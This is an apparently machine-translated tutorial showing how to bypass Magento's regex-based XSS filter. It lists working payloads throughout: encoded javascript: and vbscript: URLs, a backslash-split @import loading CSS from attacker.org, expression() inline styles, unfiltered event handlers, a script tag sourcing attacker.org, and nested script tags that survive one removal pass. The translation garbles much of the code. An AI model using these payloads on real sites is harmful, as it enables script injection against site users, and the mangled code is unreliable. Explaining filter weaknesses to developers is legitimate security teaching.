XSS Filter Bypass some poses

An XSS attack is an attack by which an attacker injects JavaScript code into a user's running page. To avoid this attack, some apps try to remove the JavaScript code from user input, but it's hard to fully implement. In this article, you will first show some code that attempts to filter JavaScript, and then give it a way to bypass it.

Take an online store application Magento Filter class Mage_core_model_input_filter_maliciouscode as an example, part of the code is as follows:

Protected$_expressions=Array('/(\/\*.*\*\/)/US ','/(\ t)/','/(javascript\s*:)/usi ','/(@import)/usi ','/style=[^<]* ((expression\s*?\ ([^<]*?\)] | ( behavior\s*:)) [^<]* (?=\>)/uis ', '/(ondblclick|onclick|onkeydown|onkeypress|onkeyup|onmousedown|onmousemove|onmouseout|onmouseover|onmouseup| Onload|onunload|onerror) =[^<]* (?=\>)/uis ','/<\/? (script|meta|link|frame|iframe). *>/uis ',     '/src=[^<]*base64[^<]* (? = \>)/uis ' ,); function filter ( $value  {    return preg_replace ( $this ->_expressions,   ",  $value );                /span>              

The array $_expressions contains a series of regular expressions for filtering and then filtering through the use of preg_replace functions for malicious code. So when trying to enter <script>foo</script> , two tags are removed and only left foo .

Let's take a look at some of the ways to get around. Our goal is to use some HTML to execute JavaScript, and some of these regular expressions are for filtering as follows:

the regular of the filter	possible use of
(javascript\s*:)	<a href="javascript:alert(‘xss‘)">
@import	@import url(http://attacker.org/malicious.css)
style=…	<div style="color: expression(alert(‘XSS‘))">
<script…	<script>alert("XSS")</script>
ondblclick|onclick|…

Javascript URL

A link tag can be used to execute JavaScript by using it in a URL javascript:… :

<a href="Javascript:alert (' Test ')">link</a>    

The filter above is removed from the code javascript: , so we can't write the code directly. But we can try to change javascript: the wording so that it can still be executed by the browser but does not match the regular expression. First try the URL encoding:

<a href="java& #115; Cript:alert (' XSS ')">link</a> 

The above code does not match the regular expression, but the browser will still execute it, because the browser will first do the URL decoding operation.

In addition, we can also use VBScript, although it is disabled in IE11, but can still run on older versions of IE or enable compatibility mode IE11. We can insert VBScript code in a way similar to the above JavaScript:

<a href= ' Vbscript:msgbox ("XSS") ' >link</a>

CSS Import

IE supports extending JavaScript in CSS, a technique called dynamic properties. It is quite dangerous to allow an attacker to load an external CSS stylesheet, because the attacker can now execute the JavaScript code in the original page.

<style> @import url ("http://attacker.org/malicious.css");</style>

MALICIOUS.CSS:

Body {color:expression (' XSS ');}

In order to bypass the @import filter, you can use backslashes in the CSS to bypass:

<style> @imp \ort url ("http://attacker.org/malicious.css");</style>

IE will accept backslashes, but we bypass the filter.

In-line style (inline style)

We can also take advantage of the dynamic features supported by Internet Explorer in the inline style:

<div style="color:expression (Alert (' XSS ')")>   

The filter will check for keywords style , followed by cannot be, followed by < expression :

/style=[^<]* ((expression\s*?\ ([^<]*?\)) | ( behavior\s*:)) [^<]* (?=\>)/Uis

So, let's put it < somewhere else:

<div style="color: ' < '; Color:expression (Alert (' XSS ')) ">   

This bypasses the filter and is also a valid CSS. Although it is < not a valid color, the rest of it can be run.

JavaScript Events

We can define JAVASCRIPT events in the element as follows:

<div onclick= "alert (' XSS ')" >

This JavaScript code is executed when someone clicks it, and other events such as page loading or moving the mouse can trigger these events. Most of the time is removed by the filter, but there are still a few events that are not filtered, for example, onmouseenter events:

<div onmouseenter= "alert (' XSS ')" >

Our code is triggered when the user mouse moves to the Div.

Another way to get around is to = insert a space between the attributes and the property. Magento still fixes the problem in the new version.

<div onclick = "alert (' XSS ')" >

Script tag

The script tag can be used to define a row of scripts or to load scripts from somewhere else:

<script>alert ("XSS") </script><script src= "Http://attacker.org/malicious.js" ></script>

And our filters remove all the <script> labels. However, it only has one removal operation, so we want to keep our target code after the removal operation:

<scr<script>ipt>alert ("XSS") </scr<script>ipt>

The filter removes two <script> tags, and the rest of the code is what we want to get. In fact, this nested method can be used to bypass all filters based on regular expressions.

Summarize

Although the filters tried to prevent script injection as much as possible, we found a way to bypass them. It is not easy to create a filter that prevents XSS attacks, and you need to consider multiple types of encodings and the features of some different browsers. This makes it very difficult for developers, but it is easy for attackers.

XSS Filter Bypass some poses